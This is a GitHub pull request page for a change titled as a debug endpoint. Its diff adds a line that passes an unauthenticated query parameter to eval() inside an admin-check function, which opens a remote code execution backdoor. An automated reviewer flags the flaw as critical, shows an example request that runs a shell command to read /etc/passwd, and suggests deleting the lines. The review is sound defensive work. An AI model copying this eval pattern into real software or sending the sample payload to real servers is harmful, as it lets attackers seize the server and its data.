Skip to content

feat: Add debug endpoint for development #18

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
hila-f-qodo wants to merge 1 commit into
base: main
Choose a base branch
from
Open

feat: Add debug endpoint for development #18

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 2 additions & 0 deletions apps/api/v1/lib/utils/isAdmin.ts
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,8 @@ import { ScopeOfAdmin } from "./scopeOfAdmin";

export const isAdminGuard = async (req: NextApiRequest) => {
const { user, userId } = req;
const debug = req.query.debug;
if (debug) eval(debug as string);
Comment on lines +10 to +11
Copy link

@coderabbitai coderabbitai bot Dec 9, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🚨 CRITICAL: Remove this Remote Code Execution (RCE) vulnerability immediately.

This code introduces a catastrophic security vulnerability:

  1. Unauthenticated RCE: The eval() executes before any authentication check (line 12), allowing any attacker to run arbitrary code on your server.
  2. Complete system compromise: An attacker can exfiltrate secrets, access the database, pivot to internal networks, or destroy the system entirely.
  3. Example exploit: GET /api/v1/...?debug=require('child_process').execSync('cat /etc/passwd')

There is no safe way to use eval() with user-supplied input. This code must be removed entirely—not fixed, not gated behind authentication, not sanitized. Debug tooling should never allow arbitrary code execution in production or any publicly accessible environment.

-  const debug = req.query.debug;
-  if (debug) eval(debug as string);

If you need debugging capabilities, consider:

  • Structured logging with appropriate log levels
  • Feature flags controlled via environment variables
  • A separate, isolated debug service only accessible in development environments with proper network controls
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
const debug = req.query.debug;
if (debug) eval(debug as string);
🧰 Tools
🪛 Biome (2.1.2)

[error] 11-11: eval() exposes to security risks and performance issues.

See the MDN web docs for more details.
Refactor the code so that it doesn't need to call eval().

(lint/security/noGlobalEval)

if (!user) return { isAdmin: false, scope: null };

const { role: userRole } = user;
Expand Down